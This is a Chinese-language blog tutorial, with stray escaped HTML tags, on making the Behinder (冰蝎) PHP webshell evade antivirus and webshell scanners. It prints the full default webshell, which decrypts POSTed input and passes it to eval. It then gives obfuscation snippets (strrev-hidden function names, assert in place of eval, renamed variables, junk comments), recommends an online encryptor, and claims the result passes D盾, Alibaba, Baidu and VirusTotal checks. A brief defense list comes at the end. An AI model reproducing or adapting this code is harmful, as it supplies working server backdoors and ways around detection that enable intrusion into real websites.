冰蝎WebShell免杀技术详解<\/h1>

一、背景与现状<\/h2>
冰蝎(Behinder)是一款常见的WebShell管理工具，其默认的WebShell脚本已被各大安全厂商加入特征库检测。本文详细分析冰蝎WebShell的免杀技术，通过多种方法绕过主流杀软检测。<\/p>
当前主流检测工具：<\/p>
D盾<\/li>
河马查杀<\/li>
阿里云WebShell查杀<\/li>
百度WebShell查杀<\/li>
VirusTotal<\/li> <\/ul>
二、原始冰蝎WebShell分析<\/h2>
原始冰蝎PHP WebShell代码：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>@<\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>session_start<\/span>();
<\/span><\/span>$key=<\/span>"e45e329feb5d925b"<\/span>; \/\/ 32位md5前16位，默认密码rebeyond
<\/span><\/span><\/span><\/span>$_SESSION['k'<\/span>]=<\/span>$key;
<\/span><\/span>$post=<\/span>file_get_contents<\/span>("php:\/\/input"<\/span>);
<\/span><\/span>if<\/span>(!<\/span>extension_loaded<\/span>('openssl'<\/span>)){
<\/span><\/span>    $t=<\/span>"base64_"<\/span>.<\/span>"decode"<\/span>;
<\/span><\/span>    $post=<\/span>$t($post.<\/span>""<\/span>);
<\/span><\/span>    for<\/span>($i=<\/span>0<\/span>;$i<<\/span>strlen<\/span>($post);$i++<\/span>){
<\/span><\/span>        $post[$i]=<\/span>$post[$i]^<\/span>$key[$i+<\/span>1<\/span>&<\/span>15<\/span>];
<\/span><\/span>    }
<\/span><\/span>} else<\/span> {
<\/span><\/span>    $post=<\/span>openssl_decrypt<\/span>($post,"AES128"<\/span>,$key);
<\/span><\/span>}
<\/span><\/span>$arr=<\/span>explode<\/span>('|'<\/span>,$post);
<\/span><\/span>$func=<\/span>$arr[0<\/span>];
<\/span><\/span>$params=<\/span>$arr[1<\/span>];
<\/span><\/span>class<\/span> C<\/span>{
<\/span><\/span>    public<\/span> function<\/span> __invoke($p){
<\/span><\/span>        eval<\/span>($p.<\/span>""<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>@<\/span>call_user_func<\/span>(new<\/span> C<\/span>(),$params);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>特征分析<\/strong>：<\/p>

固定的$key<\/code>变量名和格式<\/li>
file_get_contents("php:\/\/input")<\/code>获取输入<\/li>
使用openssl_decrypt<\/code>或异或解密<\/li>
eval<\/code>执行代码<\/li>
call_user_func<\/code>调用方式<\/li>
<\/ol>
三、基础免杀技术<\/h2>
1. 字符串反转(strrev)<\/h3>
$zyq =<\/span> (strrev<\/span>("stnetnoc_teg_elif"<\/span>))(strrev<\/span>("tupni\/\/:php"<\/span>));
<\/span><\/span>\/\/ 等价于 file_get_contents("php:\/\/input")
<\/span><\/span><\/span><\/code><\/pre>2. 变量名混淆<\/h3>
$ok =<\/span> "1989870a9753c7b3"<\/span>; \/\/ 原$key
<\/span><\/span><\/span><\/span>$_SESSION['k'<\/span>] =<\/span> $ok;
<\/span><\/span>$love =<\/span> 15<\/span>; \/\/ 替代15
<\/span><\/span><\/span><\/code><\/pre>3. 添加无用注释<\/h3>
\/* 我啥也不知道..... 
<\/span><\/span><\/span>sjfasaadssada 
<\/span><\/span><\/span>dadadad *\/<\/span>
<\/span><\/span><\/code><\/pre>4. 类名和方法混淆<\/h3>
class<\/span> MOL<\/span> {
<\/span><\/span>    public<\/span> function<\/span> __construct($p){
<\/span><\/span>        $a =<\/span> null<\/span>;
<\/span><\/span>        $l =<\/span> null<\/span>;
<\/span><\/span>        assert<\/span>("\/*#`|W$~Q*\/"<\/span>.<\/span>$l.<\/span>$p.<\/span>$a.<\/span>""<\/span>.<\/span>$<\/span>\/*#`|W$~Q*\/<\/span>");
<\/span><\/span><\/span>    }
<\/span><\/span><\/span>}
<\/span><\/span><\/span><\/code><\/pre>5. 加密函数名<\/h3>
$zyq =<\/span> (strrev<\/span>("tpyrced_lssnepo"<\/span>))($zyq,"AES128"<\/span>,$ok);
<\/span><\/span>\/\/ 等价于 openssl_decrypt
<\/span><\/span><\/span><\/code><\/pre>四、高级免杀技术 - 代码混淆加密<\/h2>
使用在线加密工具(如https:\/\/enphp.djunny.com\/)进行深度混淆：<\/p>

勾选所有加密选项<\/li>
生成高度混淆的代码<\/li>
主要混淆技术：

goto跳转控制流<\/li>
十六进制编码<\/li>
字符串分割拼接<\/li>
无用代码插入<\/li>
函数名混淆<\/li>
<\/ul>
<\/li>
<\/ol>
混淆后特点<\/strong>：<\/p>

大量goto语句打乱执行流程<\/li>
使用十六进制表示数字<\/li>
函数名替换为Unicode字符<\/li>
字符串使用base64分段拼接<\/li>
插入大量无用代码块<\/li>
<\/ul>
五、免杀效果验证<\/h2>

D盾\/河马查杀<\/strong>：通过基础混淆即可绕过<\/li>
百度\/阿里云查杀<\/strong>：需要深度混淆加密<\/li>
VirusTotal<\/strong>：全绿通过<\/li>
在线查杀平台<\/strong>：n.shellpub.com等平台检测通过<\/li>
<\/ol>
六、连接测试<\/h2>

使用冰蝎客户端连接<\/li>
密码为加密后的密钥<\/li>
功能与原始WebShell完全一致<\/li>
<\/ol>
七、免杀技术总结<\/h2>


静态免杀技术<\/strong>：<\/p>

字符串操作(strrev, substr等)<\/li>
变量\/函数名随机化<\/li>
代码结构重组<\/li>
注释和空白符插入<\/li>
加密敏感字符串<\/li>
<\/ul>
<\/li>

动态免杀技术<\/strong>：<\/p>

使用assert替代eval<\/li>
分块代码执行<\/li>
延迟加载敏感函数<\/li>
环境检测绕过<\/li>
<\/ul>
<\/li>

高级技巧<\/strong>：<\/p>

使用专业混淆工具<\/li>
自定义加密算法<\/li>
利用PHP特性(魔术方法等)<\/li>
代码分块存储<\/li>
<\/ul>
<\/li>
<\/ol>
八、注意事项<\/h2>

免杀效果具有时效性，公开的免杀方法会逐渐失效<\/li>
不同加密工具产生的效果不同，可能需要多次尝试<\/li>
实际环境中需结合目标环境调整混淆策略<\/li>
建议自行开发混淆算法而非依赖公开工具<\/li>
<\/ol>
九、防御建议<\/h2>
对于防御方：<\/p>

不要依赖单一检测工具<\/li>
关注异常行为而非静态特征<\/li>
监控文件修改和可疑PHP函数调用<\/li>
限制上传文件执行权限<\/li>
<\/ol>
本技术文档详细分析了冰蝎WebShell的免杀技术路线，从基础混淆到深度加密，提供了完整的免杀方案。实际应用中可根据需要调整混淆强度。<\/p>